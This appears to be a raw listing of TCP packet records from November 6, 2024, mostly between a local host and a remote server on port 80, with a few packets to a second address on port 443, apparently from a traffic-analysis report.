                                                                                                                                            Nov 6, 2024 16:40:39.830046892 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.830058098 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.830070019 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.830101013 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.830140114 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.846152067 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.846173048 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.846189022 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.846260071 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.846293926 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.871598005 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.871617079 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.871629953 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.871646881 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.871684074 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.871721983 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.890057087 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.890145063 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.890158892 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.890269041 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.935792923 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.935821056 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.935832977 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.935852051 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.935875893 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.935920000 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.948344946 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948374987 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948395014 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948431969 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.948467016 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.948524952 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948554993 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948571920 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.948596001 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.948621988 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.964274883 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.964335918 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.964361906 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.964375019 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.964446068 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.964473009 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.964487076 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.964514017 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.990278006 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.990295887 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:39.990341902 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:39.990362883 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.010205030 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.010221958 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.010234118 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.010287046 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.010305882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.027822971 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.027844906 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.027879953 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.027929068 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.027966976 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.037266016 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.037305117 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.037317038 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.037360907 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.037385941 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.067228079 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.067245007 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.067256927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.067269087 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.067281961 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.067311049 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.067346096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.083811998 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.083827019 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.083934069 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.109347105 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.109375954 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.109390020 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.109477997 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.129843950 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.129868984 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.129883051 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.129965067 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.129965067 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.146663904 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.146691084 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.146703959 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.146732092 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.146765947 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.156696081 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.156744957 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.156759024 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.156827927 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.156864882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.187891006 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.187910080 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.187922955 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.187958002 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.187963963 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.187980890 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.188016891 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.188395977 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.188443899 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.202200890 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.202214956 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.202373981 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.202374935 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.202405930 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.202431917 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.202470064 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.228475094 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.228496075 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.228512049 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.228538990 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.228559971 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.248378992 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.248394012 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.248409033 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.248562098 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.248562098 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.265202999 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.265316963 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.265356064 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.265367985 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.265403986 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275372028 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275432110 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275490999 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275521040 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275531054 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275661945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.275893927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.275944948 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306107998 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306129932 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306143999 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306174994 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306188107 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306200027 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.306216955 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.306235075 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.307898998 CET4435733536.138.50.131192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.307960033 CET57335443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:40.307976961 CET57335443192.168.2.1036.138.50.131
                                                                                                                                            Nov 6, 2024 16:40:40.320648909 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320662975 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320677042 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.320717096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.320736885 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.347666025 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347687960 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347700119 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.347735882 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.347765923 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.367049932 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367063046 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367074013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367080927 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.367172003 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.383797884 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383922100 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383934975 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.383994102 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.384020090 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.393989086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.394025087 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.394134045 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425087929 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425112009 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425127029 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425169945 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425196886 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425204992 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425214052 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.425291061 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.425594091 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.426759958 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.439223051 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439265013 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439277887 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.439338923 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.439356089 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.465614080 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465635061 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465656996 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.465698004 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.465737104 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485624075 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485697985 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485711098 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485722065 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485743999 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485852957 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.485929012 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.485940933 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.486011028 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.486032963 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.502322912 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502341032 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502353907 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.502403021 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.502448082 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543694973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543721914 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543742895 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543756962 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543771029 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543783903 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543817043 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543868065 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543881893 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543895006 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.543924093 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.543945074 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.558577061 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558593988 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558608055 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.558703899 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.558703899 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.584201097 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584249020 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584259987 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584271908 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.584300041 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.584330082 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.604204893 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604224920 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604238987 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.604285002 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.604315996 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.621056080 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621074915 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621088982 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621104002 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621117115 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621133089 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.621138096 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.621180058 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662309885 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662332058 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662347078 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662389040 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662414074 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662527084 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662549019 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662563086 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662580967 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662585974 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662595034 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.662621021 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.662631989 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.676573992 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676594973 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676613092 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.676655054 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.676683903 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.703059912 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703098059 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703110933 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.703172922 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.722829103 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.722850084 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.722863913 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.722899914 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.722928047 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.739765882 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739795923 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739806890 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739820957 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739835024 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739847898 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.739880085 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.739917040 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.780801058 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.780846119 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.780859947 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.780863047 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.780878067 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.780884981 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.780890942 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.780905008 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.780927896 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.781064034 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781084061 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781125069 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.781126022 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781394005 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781435966 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.781457901 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781471014 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.781510115 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.795325994 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.795348883 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.795363903 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.795419931 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.795448065 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.821620941 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.821671963 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.821686029 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.821768999 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.841447115 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.841466904 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.841480017 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.841547966 CET5723780192.168.2.10180.163.146.103
                                                                                                                                            Nov 6, 2024 16:40:40.858375072 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.858397961 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.858412027 CET8057237180.163.146.103192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:40.858424902 CET8057237180.163.146.103192.168.2.10
